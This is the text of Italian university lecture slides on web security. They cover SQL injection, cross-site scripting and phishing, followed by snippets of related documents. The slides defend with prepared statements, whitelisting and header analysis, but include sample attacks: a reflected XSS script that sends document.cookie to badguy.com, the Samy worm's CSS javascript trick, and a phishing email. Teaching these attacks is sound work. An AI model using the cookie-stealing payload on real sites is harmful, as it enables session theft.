27/11/12. Elementi di Sicurezza e Privatezza Lezione 11 Web Security (3) - Code Injection. Chiara Braghin. chiara.braghin@unimi.it!
|
|
- Norma Rosa
- 8 anni fa
- Visualizzazioni
Transcript
1 Elementi di Sicurezza e Privatezza Lezione 11 Web Security (3) - Code Injection Chiara Braghin chiara.braghin@unimi.it! SQL Injection 1
2 SQL Injection - Funzionamento di base 1 Inserire input malizioso in un form Server Vittima 2 Attaccante 3 riceve (o modifica) dati sensibili query SQL non voluta DB SQL Vittima 2 Attacco a CardSystems CardSystems w Una compagnia che gestiva il pagamento avvenuto tramite carte di credito w Attacco SQL injection nel giugno 2005 L attacco in numeri: w 263,000 numeri di carte di credito rubati dal database (i numeri venivano memorizzati in chiaro ) w 43 milioni di numeri di carte di credito esposti all attacco 3 2
3 Attacco dell aprile 2008 (1) 4 Attacco dell aprile 2008 (2) Come ha funzionato l attacco: w (1) Usato Google per trovare siti che usano un particolare stile di ASP vulnerabile ad attacchi di tipo SQL injection w (2) Usato SQL injection su questi siti, modificando la pagina restituita dal server facendo in modo che includesse un link al sito cinese nihaorr1.com (NON VISITARE IL SITO!!!!!) w (3) Il sito nihaorr1.com usa script JavaScript che sfruttano vulnerabilità in IE, RealPlayer, QQ Instant Messenger I passi (1) e (2) sono eseguiti in automatico da un tool che può venire configurato in modo che inietti qullo che si vuole nei siti vulnerabili 5 3
4 Esistono delle soluzioni? 1. Whitelisting al posto di Blacklisting 2. Validazione dell input 3. Usare Prepared Statements 6 Problemi del Blacklisting Blacklisting: indicare i caratteri che non devono essere presenti nelle stringhe di input Filtrare apici, spazi bianchi, punto e virgola e? w Si potrebbe sempre scordare un carattere pericoloso w Blacklisting non è una soluzione esauriente w Es: parametri numerici? Può essere in conflitto con alcuni requisiti funzionali: w Come memorizzare O Brien nel DB se gli apici non sono permessi? 7 4
5 Whitelisting Whitelisting: permettere solo input che rientrano in un ben definito insieme di valori w L insieme di valori in genere viene definito usando espressioni regolari w RegExp è il pattern con cui confrontare le stringhe in ingresso Es: il parametro month deve essere un intero nonnegativo w RegExp: ^[0-9]*$ - 0 o più cifre, insieme sicuro ^ e $ indicano l inizio e la fine della stringa [0-9] indica cifre, * indica 0 o più 8 Prepared Statements & Bind Variables Meccanismo di base per SQL Injection: Alcuni metacaratteri (e.g. apici) servono per distinguere i dati dal controllo nelle query w Nella maggior parte degli attacchi: dati interpretati come controllo, alterando la semantica della query Bind Variable:? segnaposto che garantiscono si tratti di dati (non di controllo) Prepared Statements permettono la creazione di query statiche con bind variable w Preserva la struttura della query attesa w I parametri non vengono considerati in fase di parsing della query 9 5
6 Java Prepared Statements PreparedStatement ps = db.preparestatement("select pizza, toppings, quantity, order_day " + "FROM orders WHERE userid=? AND order_month=?"); ps.setint(1, session.getcurrentuserid()); ps.setint(2, Integer.parseInt(request.getParamenter("month"))); ResultSet res = ps.executequery(); Bind Variable: segnaposto per i dati Le bind variable sono tipate: l input deve essere del tipo che ci si aspetta (e.g. int, string) 10 PHP Prepared Statements $ps = $db->prepare( 'SELECT pizza, toppings, quantity, order_day '. 'FROM orders WHERE userid=? AND order_month=?'); $ps->execute(array($current_user_id, $month)); Bind Variable: segnaposto per i dati Non c è la tipizzazione dei parametri come in Java!!!! SQL injection è ancora possibile! 11 6
7 Conclusione Gli attacchi di tipo SQL injection sono delle minacce che possono: w Rilasciare dati sensibili w Alterare o danneggiare dati critici w Dare ad un attaccante un accesso non autorizzato ad un DB Idea chiave per combatterli: usare diverse soluzioni, in modo consistente! w Validazione dell input basato su whitelisting w Prepared Statements con bind variable (meglio se tipate) 12 XSS Cross Site Scripting 7
8 Cosa è XSS? (1) Forma di attacco in cui l attaccante è in grado di eseguire del codice arbitrario (script) nella pagina Web visualizzata da un altro utente Compromette il client, non il server 14 Cosa è XSS? (2) Obiettivi dell attacco: w Rubare cookie di sessione w Eseguire azioni (anche in modo implicito) per le quali solo l utente attaccato ha i privilegi w Visualizzare contenuti falsi o modificati w Diffondere l attacco postando il codice nella pagina di un social network, facendo in modo che tutti gli amici dell utente vengano infettati 15 8
9 Cosa è XSS? (3) Un attacco XSS inserisce uno script (script injection) nella(e) pagina(e) generata(e) da un server Web Metodi per inserire lo script : w Reflected XSS ( tipo 1, detto anche non persistente) L utente che subisce l attacco segue un link malizioso che lo rimanda ad un server vulnerabile che scrive l attacco XSS nella risposta Il contenuto della pagina spedita come risposta dal server viene modificato in modo non permanente ed esclusivamente per le richieste HTTP che utilizzano tale URL appositamente forgiato Lo script, contenuto in qualche modo nel link malizioso, viene spedito all utente come parte di una pagina del server vulnerabile w Stored XSS ( tipo 2, detto anche persistente) L attaccante salva il codice malizioso tra le risorse gestite dal server Web vulnerabile (per esempio un DB), ad esempio inserendolo come commento Il contenuto della pagina viene modificato permanentemente, quindi tutti gli utenti che successivamente accedono al sito Web gestito da tale server sono potenzialmente attaccabili 16 Come inserire lo script? Form URL Feed RSS, sistemi integrati, ecc. 17 9
10 Reflected XSS - esempio (1) Supponiamo che sul sito victim.com ci sia un campo di ricerca: w term = apple E che search.php a lato server crei la pagina: <HTML><TITLE>Risultati della ricerca</title>! <BODY>! Risultati per <?php echo $_GET[term]?> :!...! </BODY>! </HTML>! 18 Reflected XSS - esempio (2) Si consideri il seguente URL (generato dall attaccante badguy.com): term =!!!<script> window.open(!!! = +!!!!document.cookie ) </script> Cosa succede se l utente fa click sul link? w Il browser va a victim.com/search.php w Victim.com ritorna la seguente pagina: <HTML> Risultati per <script> </script> w Il browser esegue lo script: Spedisce a badguy.com i cookie dell utente 19 10
11 Reflected XSS - esempio (3) Attaccante 1. L utente riceve il link cattivo term = <script>... </script> 2. L utente fa click sul link Client vittima 3. Il server vittima rimanda indietro senza verificarlo l input dell utente <html> Risultati per <script> window.open( document.cookie...) </script> </html> Server Vittima 20 Reflected XSS - in generale (1) 1 4 Script injection Durante l esecuzione dello script, spedisce dati confidenziali Attaccante Client vittima 3 2 Riflette l input indietro all utente senza verificarlo Spedisce (inconsapevolmente) lo script Server Vittima 21 11
12 Reflected XSS - in generale (2) Possibile quando un server Web è dinamico e genera una pagina utilizzando dati inseriti dal client mediante i parametri della richiesta HTTP o di un form, senza verificarli In questo caso il server si dice XSS vulnerable 22 Reflected XSS - in generale (3) 1. Alice spesso visita il sito di Bob, che è un server XSS vulnerable e ha i privilegi per memorizzare i dati sensibili di Alice 2. Eve osserva quanto sopra, crea un URL che sfrutta tale vulnerabilità e spedisce ad Alice una mail con l URL (che punta al sito di Bob, ma contiene uno script malizioso ) 3. Alice visita l URL e lo script di Eve viene eseguito dal browser di Alice, come se venisse direttamente da Bob 23 12
13 Same-origin policy dei browser (1) Detta anche cross-domain security policy Introdotta da Netscape Navigator 2.0 Limita l interazione tra pagine Web che provengono da domini diversi w Gli script possono accedere solo alle proprietà (cookie, oggetti DOM) di documenti che hanno la stessa origine w NB1: i link, i frame, le immagini, i fogli di stile e gli script possono appartenere e provenire da domini diversi 24 Same-origin policy dei browser (2) Origin: protocol, hostname, port, ma non il path Same Origin w w w stesso protocollo: http, host: examplesite, default port 80 All Different Origins w w w w w Protocollo diverso: http vs. https, porte diverse: 80 vs. 8080, host diversi: examplesite vs. hackerhome 25 13
14 Same-origin policy dei browser (3) Con l attacco XSS viene bypassata la same-origin policy! 26 Esempio: attacco a PayPal Attacco del 2006: w Gli utenti vengono contattati via e gli viene richiesto di accedere ad un URL che si trova sul sito (legittimo) di PayPal w Del codice iniettato nell URL ridireziona i visitatori ad una pagina che comunica loro che i loro account sono stati compromessi w Le vittime vengono quindi redirette ad un sito (non legittimo!!) dove veniva loro chiesto di inserire i loro dati sensibili Riferimento:
15 Stored XSS - in generale (1) Attaccante Client vittima Rilascio di dati confidenziali Richiesta di una pagina 1 Inserimento dello script malizioso Riceve lo script malizioso Server Vittima 28 Stored XSS - in generale (2) Possibile grazie a siti con online message board dove gli utenti possono inserire messaggi formattati in HTML Scenario: 1. Eve posta in un social network un messaggio con un corpo malizioso 2. Quando Bob legge il messaggio, lo script malizioso legge il cookie di Bob e lo spedisce a Eve 3. Eve ora può impersonare Bob 29 15
16 Stored XSS - esempio (1) Attacco a MySpace.com (il Worm Samy) w Gli utenti possono postare codice HTML nelle loro pagine w MySpace.com verifica che l HTML non contenga <script>, <body>, onclick, <a href=javascript://> w ma Javascript nei tag CSS è permesso: <div style= background:url( javascript:alert(1) ) > Con un attento Javascript hacking: w Il worm Samy infetta chiunque visiti una pagina di MySpace infettata, e aggiunge Samy come amico w In 24 ore Samy aveva milioni di amici!! 30 Stored XSS - esempio (2) Stored XSS tramite immagini w Si supponga che il file foto.jpg contenga HTML La richiesta ha come risposta: HTTP/ OK!! Content-Type: image/jpeg! <html> scherzetto! </html>! Il browser visualizzerà la risposta come HTML, non curante del Content-Type w Si supponga che esista un sito di condivisione foto che permette di scaricare le immagini..cosa succede se un utente scarica un immagine che è uno script? 31 16
17 XSS: Come difendersi? A lato server: w Analizzare i dati in input e "depurare" i parametri in ingresso degli elementi potenzialmente nocivi (i.e., tag HTML, apici, simboli utilizzati dal linguaggio di programmazione, ) A lato client: w Mantenere aggiornati i browser, le ultime versioni includono un filtro per questo tipo di attacchi w Firefox: Content Security Policy 32 Phishing 17
18 Phishing Attività illegale che pesca utenti in rete e li porta a visitare un sito Web malizioso che recupera a loro insaputa informazioni personali o riservate Obiettivo: w Recuperare le credenziali di accesso usate per il servizio di homebanking che la maggior parte delle banche/istituti di credito mettono a disposizione dei propri clienti w Trasferimento illecito di soldi (ovviamente all insaputa della vittima) 34 Funzionamento Le vittime vengono indotte ad inserire i propri dati in un sito Web che simula graficamente quello ufficiale I dati inseriti vengo memorizzati ed usati dall attaccante per avere accesso al vero sito come un normale cliente 35 18
19 Come pescare le vittime? (1) Delle mail fasulle inducono la vittima a visitare il finto sito: w La mail contiene quasi sempre avvisi di particolari situazioni o problemi che richiedono l accesso alla parte del sito autenticata (un addebito enorme, la scadenza dell'account, ecc.) Il link presente nella mail indirizza l utente al sito di phishing e non al sito ufficiale 36 Come pescare le vittime? @ 1. L attaccante invia a migliaia di indirizzi internet una mail spacciandosi per un istituto bancario Gentile utente, per motivi di sicurezza la invitiamo al più presto a controllare il proprio account personale L utente riceve la mail dove gli viene chiesto di cliccare su di un link ed inserire i propri codici d accesso ATTACCANTE 3. I codici inseriti arrivano direttamente all attacante che li userà per i suoi scopi illeciti 37 19
20 Come riconoscere l attacco? (1) Alcune parti della mail, se osservate con attenzione, possono segnalare che si tratta di una comunicazione anomala : w indirizzo del mittente del messaggio w italiano stentato: errori ortografici, di sintassi o di coniugazione verbi, in quanto generata da un traduttore automatico w link ad una pagina esterna w segnalazioni di blocco del conto, minacce di chiusura del conto o di servizi, piuttosto che segnalazioni di vittorie o premi a patto che si inseriscano i codici personali 38 Come riconoscere l attacco? (2) Mittente fasullo Il mittente rapport@sanpaolo.com è un indirizzo sospetto che una banca difficilmente utilizzerebbe per le sue comunicazioni ufficiali 39 20
21 Come riconoscere l attacco? (3) Italiano zoppicante: Gentile Cliente, Gruppo Poste spa premia il suo account con un bonus di fedeltã. Per ricevere il bonus à necesario accedere ai servizi online entro 48 ore dalla ricezione di questa . Importo bonus vinto: euro 250,00; Commissioni: euro 1,00; Importo totale: euro 251,00 Accedi ai servizi online per accreditare il bonus fedeltã. Per ulteriori informazioni consulta il sito web. La ringraziamo per aver scelto i nostri servizi. Distinti Saluti Gruppo Poste spa 40 Come riconoscere l attacco? (4) Il testo del link (1) non coincide con il vero URL Infatti il browser verrà indirizzato ad un IP (2) che corrisponde al sito fasullo 41 21
22 Come difendersi? (1) Analizzare il codice sorgente della mail <<! X-Account-Key: account2 X-UIDL: X-Mozilla-Status: 0001 X-Mozilla-Status2: Return-Path: Received: from vsmtp20.tin.it ( ) by ims3a.cp.tin.it ( ) id 4421EA10006D86D2 for Wed, 15 Apr :19: Received: from mail.luanett.com.br ( ) by vsmtp20.tin.it ( ) id 4405C7C102F5CF4A for Wed, 5 Apr :18: Message-ID: <4405C7C102F5CF4A@vsmtp20.tin.it> (added by postmaster@virgilio.it) Received: (qmail invoked by uid 1020); 4 Apr :18: Received: from by cometa (envelope-from <rapport@sanpaolo.com>, uid 89) with qmail-scanner-1.24-st-qms (clamdscan: 0.80/633. spamassassin: perlscan: 1.24-st-qms. Clear:RC:0( ):SA:0(4.7/5.0):. Processed in secs); 05 Apr :18: X-Spam-Status: No, hits=4.7 required=5.0 X-Spam-Level: ++++ X-Antivirus-Luanett-Mail-From: rapport@sanpaolo.com via cometa X-Antivirus-Luanett: 1.24-st-qms (Clear:RC:0( ):SA:0(4.7/5.0):. Processed in secs Process 27729) Received: from user-ip sel.rdsnav.ro (HELO service) (service@ ) by mail.luanett.com.br with SMTP; 4 Apr :18: Reply-To: <no0reply@sanpaolo.com> From: "Banca San Paolo IMI"<rapport@sanpaolo.com> Subject: Important Circa Il *** Imminente Di Cliente Di Bank Della Squadra Del Internet Date: Wed, 5 Apr :18: MIME-Version: 1.0 >>! 42 Come difendersi? (2) Received: from ! Utilizzando uno dei siti che mettono a disposizione il servizio WHO IS è possibile ottenere maggiori informazioni sull indirizzo IP di partenza. In questo caso risulta che l host sia in Romania E sicuramente una buona ragione per dubitare che la provenienza della mail sia la Banca San Paolo
23 Esempio (1) 44 Esempio (2) 45 23
24 Esempio (3) L URL del sito inizia con HTTP invece che con HTTPS Molto strano che un sito cosi importante utilizzi protocolli non sicuri per l autenticazione degli utenti! 46 Esempio (4) 47 24
25 Statistiche (1) 48 Statistiche (2) 49 25
26 Statistiche (3) 50 Statistiche (4) I più bersagliati sono i clienti di Poste Italiane e di Intesa S. Paolo, seguiti da quelli di Cartasì, ma non mancano i soliti ebay e PayPal In tutti i casi esaminati i siti di phishing sono praticamente indistinguibili dall originale, se non per qualche dettaglio 51 26
Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2)
Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2) Chiara Braghin chiara.braghin@unimi.it XSS Cross Site Scripting Cosa è XSS? (1) Forma di attacco in cui l attaccante è in
DettagliElementi di Sicurezza e Privatezza Lezione 14 Web Security. Chiara Braghin
Elementi di Sicurezza e Privatezza Lezione 14 Web Security Chiara Braghin Web, vulnerabilità e attacchi Attacchi comuni (2006) Cross-site scripting (XSS) 22% SQL Injection 14 % PHP Include 10% Buffer overflow
DettagliElementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1)
Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Chiara Braghin chiara.braghin@unimi.it Le 2 maggiori vulnerabilità dei siti Web SQL Injection Il browser spedisce dell input
Dettagli19. LA PROGRAMMAZIONE LATO SERVER
19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici
DettagliNelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento
I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere
DettagliEsercizi di JavaScript
Esercizi di JavaScript JavaScript JavaScript é un linguaggio di programmazione interpretato e leggero, creato dalla Netscape. E' presente a patire da Netscape 2 in tutti i browser ed é dunque il linguaggio
Dettagli[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection
---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------
DettagliClient - Server. Client Web: il BROWSER
Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare
DettagliTitolare del trattamento dei dati innanzi descritto è tsnpalombara.it
Decreto Legislativo 196/2003 Codice in materia di protezione dei dati personali COOKIE POLICY La presente informativa è resa anche ai sensi dell art. 13 del D.Lgs 196/03 Codice in materia di protezione
DettagliCorso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti
Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione
DettagliProtocolli applicativi: FTP
Protocolli applicativi: FTP FTP: File Transfer Protocol. Implementa un meccanismo per il trasferimento di file tra due host. Prevede l accesso interattivo al file system remoto; Prevede un autenticazione
DettagliInstallazione di Moodle. Preparato per: Gruppo A, Piattaforma di E - Learning Preparato da: Cinzia Compagnone, Vittorio Saettone
Installazione di Moodle Preparato per: Gruppo A, Piattaforma di E - Learning Preparato da: Cinzia Compagnone, Vittorio Saettone 21 maggio 2006 Installazione di Moodle Come installare Moodle: Questa guida
Dettagli2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine.
ESERCIZIARIO Risposte ai quesiti: 2.1 Non sono necessarie modifiche. Il nuovo protocollo utilizzerà i servizi forniti da uno dei protocolli di livello trasporto. 2.2 Il server deve essere sempre in esecuzione
DettagliMODELLO CLIENT/SERVER. Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it
MODELLO CLIENT/SERVER Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it POSSIBILI STRUTTURE DEL SISTEMA INFORMATIVO La struttura di un sistema informativo
Dettagli- Corso di computer -
- Corso di computer - @ Cantiere Sociale K100-Fuegos Laboratorio organizzato da T-hoster.com www.t-hoster.com info@t-hoster.com La posta elettronica La Posta Elettronica è un servizio internet grazie al
DettagliElementi di Sicurezza e Privatezza Lezione 1 - Introduzione
Elementi di Sicurezza e Privatezza Lezione 1 - Introduzione Chiara Braghin chiara.braghin@unimi.it Inziamo a interagire Chi prova a rispondere alle seguenti domande: w Cosa si intende per sicurezza informatica?
DettagliCome funziona il WWW. Architettura client-server. Web: client-server. Il protocollo
Come funziona il WWW Il funzionamento del World Wide Web non differisce molto da quello delle altre applicazioni Internet Anche in questo caso il sistema si basa su una interazione tra un computer client
DettagliBibliografia: Utenti e sessioni
Bibliografia: Utenti e sessioni http: protocollo stateless http si appoggia su una connessione tcp e lo scambio nel contesto di una connessione si limita a invio della richiesta, ricezione della risposta.
Dettaglisito web sito Internet
Siti Web Cos è un sito web Un sito web o sito Internet è un insieme di pagine web correlate, ovvero una struttura ipertestuale di documenti che risiede, tramite hosting, su un web server e accessibile
DettagliIstruzioni per il pagamento con Carta di Credito
Sommario Sommario...1 Istruzioni per il pagamento con Carta di Credito...2 Maschera dei pagamenti... 2 Effettuare la transazione... 4 Risoluzione problemi...7 Problemi legati alla configurazione della
DettagliProcedura SMS. Manuale Utente
Procedura SMS Manuale Utente INDICE: 1 ACCESSO... 4 1.1 Messaggio di benvenuto... 4 2 UTENTI...4 2.1 Gestione utenti (utente di Livello 2)... 4 2.1.1 Creazione nuovo utente... 4 2.1.2 Modifica dati utente...
DettagliGESGOLF SMS ONLINE. Manuale per l utente
GESGOLF SMS ONLINE Manuale per l utente Procedura di registrazione 1 Accesso al servizio 3 Personalizzazione della propria base dati 4 Gestione dei contatti 6 Ricerca dei contatti 6 Modifica di un nominativo
DettagliLA GESTIONE DELLE VISITE CLIENTI VIA WEB
LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici
DettagliSiti interattivi e dinamici. in poche pagine
Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata
DettagliTeamPortal. Servizi integrati con ambienti Gestionali
TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione
DettagliLa posta elettronica. Informazioni di base sul funzionamento
La posta elettronica Informazioni di base sul funzionamento Il meccanismo della posta elettronica - 1 MARIO SMTP Internet SMTP/POP 1 2 3 LAURA Mario Rossi deve inviare un messaggio di posta elettronica
DettagliScuola Digitale. Manuale utente. Copyright 2014, Axios Italia
Scuola Digitale Manuale utente Copyright 2014, Axios Italia 1 SOMMARIO SOMMARIO... 2 Accesso al pannello di controllo di Scuola Digitale... 3 Amministrazione trasparente... 4 Premessa... 4 Codice HTML
DettagliUtilizzo dei Cookie Cosa sono i cookie? A cosa servono i cookie? cookie tecnici cookie, detti analitici cookie di profilazione
Utilizzo dei Cookie Questo sito utilizza i cookie. Utilizzando il nostro sito web l'utente accetta e acconsente all utilizzo dei cookie in conformità con i termini di uso dei cookie espressi in questo
DettagliMANUALE PARCELLA FACILE PLUS INDICE
MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella
DettagliIndividuare Web Shell nocive con PHP Shell
http://www.readability.com/articles/7e9rlg94 html.it ORIGINAL PAGE Individuare Web Shell nocive con PHP Shell Detector by ANDREA DRAGHETTI Una shell Web è uno script, comunemente scritto in PHP, in grado
DettagliProgrammazione Web. Laboratorio 4: PHP e MySQL
Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi
DettagliRisultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti
Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti Il 27 aprile 2012 Il team della società Doctor Web continua a esaminare la prima nella storia botnet di vasta scala creata
Dettagli1) GESTIONE DELLE POSTAZIONI REMOTE
IMPORTAZIONE ESPORTAZIONE DATI VIA FTP Per FTP ( FILE TRANSFER PROTOCOL) si intende il protocollo di internet che permette di trasferire documenti di qualsiasi tipo tra siti differenti. Per l utilizzo
DettagliLe caselle di Posta Certificata attivate da Aruba Pec Spa hanno le seguenti caratteristiche:
1 di 6 05/01/2011 10.51 Supporto Tecnico Quali sono le caratteristiche di una casella di posta certificata? Come ricevere e consultare messaggi indirizzati alle caselle di posta certificata? Come posso
Dettagli--- PREMESSE INTRODUZIONE. .:luxx:.
SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una
DettagliLegenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.
Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il
DettagliManuale per la configurazione di un account di PEC in Mozilla.
Manuale per la configurazione di un account di PEC in Mozilla. 1/21 AVVIO DI MOZILLA E CREAZIONE NUOVO ACCOUNT. 3 IMPOSTAZIONI AVANZATE. 12 SCARICA MESSAGGI. 15 APERTURA DI UN MESSAGGIO DI PEC. 15 RICEVUTA
DettagliObiettivi d esame PHP Developer Fundamentals on MySQL Environment
Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web
DettagliManuale LiveBox WEB ADMIN. http://www.liveboxcloud.com
2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa
DettagliProgetto ittorario Anno scol. 2013-2014
PROGETTO ittorario Scopo: Creazione di una pagina web che mostri l orario di un docente, della classe della materia o dell aula a discrezione dell utente. Sviluppatori: Progetto sviluppato dalla classe
Dettagli1. Manuale d uso per l utilizzo della WebMail PEC e del client di posta tradizionale
1. Manuale d uso per l utilizzo della WebMail PEC e del client di posta tradizionale Per poter accedere alla propria casella mail di Posta Elettronica Certificata è possibile utilizzare, oltre all'interfaccia
DettagliCookie. Krishna Tateneni Jost Schenck Traduzione: Luciano Montanaro
Krishna Tateneni Jost Schenck Traduzione: Luciano Montanaro 2 Indice 1 Cookie 4 1.1 Politica............................................ 4 1.2 Gestione........................................... 5 3 1
DettagliSITI-Reports. Progetto SITI. Manuale Utente. SITI-Reports. ABACO S.r.l.
Progetto SITI Manuale Utente SITI-Reports ABACO S.r.l. ABACO S.r.l. C.so Umberto, 43 46100 Mantova (Italy) Tel +39 376 222181 Fax +39 376 222182 www.abacogroup.eu e-mail : info@abacogroup.eu 02/03/2010
DettagliInformatica per la comunicazione" - lezione 10 -
Informatica per la comunicazione" - lezione 10 - Evoluzione del Web" Nell evoluzione del Web si distinguono oggi diverse fasi:" Web 1.0: la fase iniziale, dal 1991 ai primi anni del 2000" Web 2.0: dai
DettagliCorso di PHP. Prerequisiti. 6.1 PHP e il web 1. Conoscenza HTML Tecnica della programmazione Principi di programmazione web
Corso di PHP 6.1 PHP e il web 1 1 Prerequisiti Conoscenza HTML Tecnica della programmazione Principi di programmazione web 2 1 Introduzione In questa Unità illustriamo alcuni strumenti di programmazione
DettagliGuida alla registrazione on-line di un DataLogger
NovaProject s.r.l. Guida alla registrazione on-line di un DataLogger Revisione 3.0 3/08/2010 Partita IVA / Codice Fiscale: 03034090542 pag. 1 di 17 Contenuti Il presente documento è una guida all accesso
DettagliFile, Modifica, Visualizza, Strumenti, Messaggio
Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere
DettagliSMS API. Documentazione Tecnica YouSMS HTTP API. YouSMS Evet Limited 2015 http://www.yousms.it
SMS API Documentazione Tecnica YouSMS HTTP API YouSMS Evet Limited 2015 http://www.yousms.it INDICE DEI CONTENUTI Introduzione... 2 Autenticazione & Sicurezza... 2 Username e Password... 2 Connessione
DettagliConfigurazione di Outlook Express
OUTLOOK Outlook Express è il client di posta elettronica sviluppato da Microsoft, preinstallato su sistemi operativi Windows a partire da Windows 98 fino all'uscita di Windows XP. Con l'arrivo di Windows
DettagliIl seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo
Modulo 7 Reti informatiche Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo Scopi del modulo Modulo 7 Reti informatiche,
DettagliIl Protocollo HTTP e la programmazione di estensioni Web
Il Protocollo HTTP e la programmazione di estensioni Web 1 Il protocollo HTTP È il protocollo standard inizialmente ramite il quale i server Web rispondono alle richieste dei client (prevalentemente browser);
DettagliBenvenuto. Questa semplice guida ha lo scopo di aiutarti nel migliore dei modi a sfruttare tutte le caratteristiche che SuperBanner.org offre.
Benvenuto. Questa semplice guida ha lo scopo di aiutarti nel migliore dei modi a sfruttare tutte le caratteristiche che SuperBanner.org offre. Questa è la schermata principale che vedrai ogni volta che
DettagliSICUREZZA INFORMATICA MINACCE
SICUREZZA INFORMATICA MINACCE Come evitare gli attacchi di phishing e Social Engineering Ver.1.0, 19 febbraio 2015 2 Pagina lasciata intenzionalmente bianca 1. CHE COSA È UN ATTACCO DI SOCIAL ENGINEERING?
DettagliWeb Programming Specifiche dei progetti
Web Programming Specifiche dei progetti Paolo Milazzo Anno Accademico 2010/2011 Argomenti trattati nel corso Nel corso di Web Programming sono state descritti i seguenti linguaggi (e tecnologie): HTML
DettagliINFORMATIVA SUI TRATTAMENTI DEI DATI PERSONALI
INFORMATIVA SUI TRATTAMENTI DEI DATI PERSONALI SOMMARIO AMBITO DI APPLICAZIONE DELLA NOTA INFORMATIVA... 2 INFORMAZIONI RACCOLTE... 2 SEGRETERIA... 2 INTERNET... 2 MOTIVI DELLA RACCOLTA DELLE INFORMAZIONI
DettagliInstallazione di GFI Network Server Monitor
Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows
DettagliConfigurazione client di posta elettronica per il nuovo servizio email. Parametri per la Configurazione dei client di posta elettronica
Configurazione client di posta elettronica per il nuovo servizio email Questa guida si prefigge lo scopo di aiutare gli utenti a configurare i propri client di posta elettronica. Sono elencati passi da
DettagliZ3 B1 Message Addon Invio Massivo Documenti via Email e Fax per SAP Business One
Z3 B1 Message Addon Invio Massivo Documenti via Email e Fax per SAP Business One Manuale Z3 B1 Message Versione 2.60 Pagina 1 di 19 Sommario Introduzione... 3 Installazione... 3 Attivazione... 3 Configurazione...
DettagliAttacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)
UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL
DettagliArchitettura client-server
Architettura client-server In un architettura client-server ci sono due calcolatori connessi alla rete: un client che sottopone richieste al server un server in grado di rispondere alle richieste formulate
DettagliIntegrazione InfiniteCRM - MailUp
Integrazione InfiniteCRM - MailUp La funzionalità della gestione delle campagne marketing di icrm è stata arricchita con la spedizione di email attraverso l integrazione con la piattaforma MailUp. Creando
DettagliCorso di Informatica Modulo T3 B1 Programmazione web
Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo
